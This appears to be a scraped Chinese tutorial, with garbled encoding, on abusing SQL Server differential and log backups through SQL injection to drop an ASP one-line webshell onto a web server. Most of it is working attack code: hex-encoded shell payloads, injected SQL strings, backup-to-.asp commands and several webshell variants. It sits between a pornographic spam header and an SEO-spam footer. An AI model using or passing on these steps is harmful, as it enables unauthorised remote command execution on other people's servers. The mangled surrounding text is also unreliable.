国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數(shù)據(jù)庫 > SQL Server > 正文

復(fù)習(xí)一下sql server的差異備份

2024-08-31 01:00:09
字體:
供稿:網(wǎng)友
MSSQL差異備份,就是和前一次備份作對比,把不一樣的內(nèi)容備份下來,這樣,只要前一次備份后,插入新的內(nèi)容,差異備份就可以把剛插入的內(nèi)容備份出來,而這個備份文件將大大減少,得到webShell的成功也提高了不少! 

差異備份的流程大概這樣:
1.完整備份一次(保存位置當(dāng)然可以改)
backup database 庫名 to disk = 'c:/ddd.bak';--

2.創(chuàng)建表并插曲入數(shù)據(jù)
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.進行差異備份
backup database 庫名 to disk='目標(biāo)位置/d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
就是一句話木馬的內(nèi)容:<%execute(request("a"))%>

如下是網(wǎng)上常見的差異備份代碼,思路一樣!
===================================================
利用差異備份提高提高backupwebshell的成功率,減少文件大小
步驟:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

0x77006F006B0061006F002E00620061006B00為wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:/web/wokao.asp

聲明:方法不是我想的,我只是寫工具,默認(rèn)得到shell是
<%execute(request("a"))%>
===============================================================

我發(fā)現(xiàn)上面代碼,有時會無效,而直接用

backup database 庫名 to disk = 'c:/ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 庫名 to disk='目標(biāo)位置/d.asp' WITH DIFFERENTIAL,FORMAT;--

卻可以成功,所以把最原始的方法寫出來!思路是前人所創(chuàng),這不說大家也知道的!

庫名 必須要有效的庫名,一般注入工具都可以得到!如果某站過濾 "‘",就要把字符內(nèi)容轉(zhuǎn)為數(shù)值了!


網(wǎng)上還有l(wèi)og增量備份的,我也把他記錄一下
=====================================================
另一種log增量備份技術(shù):

';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:/cmd' with init--

';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--

';backup log null to disk = '備份路徑'--

PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句話小馬16進制轉(zhuǎn)來的

說到一句話馬,還可以有這么幾種寫法:

a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).<script language=VBScript runat=server>execute request("a")</script>
e).<%25Execute(request("a"))%25> 
發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 峡江县| 玛纳斯县| 桦南县| 开平市| 孟州市| 客服| 宜黄县| 孟连| 印江| 静乐县| 扎鲁特旗| 瑞金市| 鄂尔多斯市| 汶上县| 扎鲁特旗| 民丰县| 东方市| 炉霍县| 芮城县| 玉田县| 舞钢市| 庆阳市| 如皋市| 乌鲁木齐县| 宁乡县| 定结县| 仁寿县| 仪征市| 东平县| 普格县| 常宁市| 边坝县| 松阳县| 天津市| 溆浦县| 蒲江县| 大余县| 太保市| 万荣县| 潜江市| 大厂|